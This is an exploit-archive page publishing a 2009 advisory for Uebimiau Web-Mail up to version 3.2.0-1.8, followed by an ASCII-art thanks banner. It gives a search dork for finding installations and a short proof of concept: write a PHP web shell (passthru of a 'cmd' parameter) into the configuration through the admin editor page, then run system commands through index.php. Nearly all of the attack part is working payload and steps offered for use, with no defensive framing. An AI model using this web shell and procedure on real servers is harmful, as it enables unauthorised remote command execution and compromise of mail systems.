[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Uebimiau Web-Mail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
# Published : 2009-06-12
# Author : GoLd_M
# Previous Title : TransLucid 1.75 Multiple Remote Vulnerabilities
# Next Title : phpWebThings <= 1.5.2 (help.php module) Local File Inclusion Vuln
Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
/uebimiau/admin/editor.php?load=config
And You Can Write Any Code As
<?php passthru($_GET[cmd]); ?> After That Click {Write To File}
Go
/uebimiau/index.php?cmd=id
See Pic :http://www.almlf.com/get-6-2009-almlf_com_akszizl2.png
Thanx To
.___________..______ ____ ____ ___ _______
| || _ / / / / _____|
`---| |----`| |_) | / / / ^ | | __
| | | / _ _/ / /_ | | |_ |
| | | | ----. | | / _____ | |__| |
|__| | _| `._____| |__| /__/ __ ______|
___ ______ ___ _______ _______ .___ ___. ____ ____
/ / | / | | ____|| / | / /
/ ^ | ,----' / ^ | .--. || |__ | / | / /
/ /_ | | / /_ | | | || __| | |/| | _ _/
/ _____ | `----./ _____ | '--' || |____ | | | | | |
/__/ __ ______/__/ __ |_______/ |_______||__| |__| |__|
# www.Syue.com [2009-06-12]